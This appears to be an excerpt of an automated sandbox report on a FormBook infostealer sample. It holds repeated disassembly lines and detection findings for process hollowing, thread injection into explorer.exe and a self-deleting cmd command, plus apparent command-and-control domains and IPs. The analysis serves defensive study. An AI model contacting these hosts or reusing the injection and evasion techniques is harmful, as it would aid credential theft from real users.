          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C04015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C04015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B50050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B50050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BCC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BCC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B61DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B61DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B61DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B62990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BE8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BC41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BFE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BBA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B64D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B64D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B64D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B54120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B57D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C08D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B73D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C08ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BCFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B62AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B78EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B62ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BEFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BEFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B74A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B74A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C08A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B35210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B35210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B35210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B35210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B53A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B68E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B48A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B7927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BEB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BEB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BFEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BC4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BFAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BFAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B64BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B64BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B64BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B48794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B62397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B41B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B41B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BED380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C05BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.middreampostal.com
          Source: C:\Windows\explorer.exeDomain query: www.purpleqube.com
          Source: C:\Windows\explorer.exeNetwork Connect: 119.81.95.146 80
          Source: C:\Windows\explorer.exeDomain query: www.bancambios.network
          Source: C:\Windows\explorer.exeDomain query: www.xn---yado-8e4dze0c.site
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeNetwork Connect: 150.95.255.38 80
          Source: C:\Windows\explorer.exeDomain query: www.oceancollaborative.com
          Source: C:\Windows\explorer.exeNetwork Connect: 184.175.83.64 80
          Source: C:\Windows\explorer.exeNetwork Connect: 185.224.138.83 80
          Source: C:\Windows\explorer.exeDomain query: www.thechandeck.com
          Source: C:\Windows\explorer.exeNetwork Connect: 154.215.150.183 80
          Source: C:\Windows\explorer.exeDomain query: www.bluebeltpanobuy.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeSection loaded: unknown target: C:\Users\user\Desktop\5t2CmTUhKc.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeThread register set: target process: 3440
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 3440
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: 13B0000
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeProcess created: C:\Users\user\Desktop\5t2CmTUhKc.exe 'C:\Users\user\Desktop\5t2CmTUhKc.exe'
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\5t2CmTUhKc.exe'
          Source: explorer.exe, 00000005.00000000.344210993.0000000000EE0000.00000002.00000001.sdmp, help.exe, 0000000B.00000002.599509130.00000000052B0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.344210993.0000000000EE0000.00000002.00000001.sdmp, help.exe, 0000000B.00000002.599509130.00000000052B0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.344210993.0000000000EE0000.00000002.00000001.sdmp, help.exe, 0000000B.00000002.599509130.00000000052B0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.344210993.0000000000EE0000.00000002.00000001.sdmp, help.exe, 0000000B.00000002.599509130.00000000052B0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.5t2CmTUhKc.exe.2290000.3.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.5t2CmTUhKc.exe.2290000.3.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
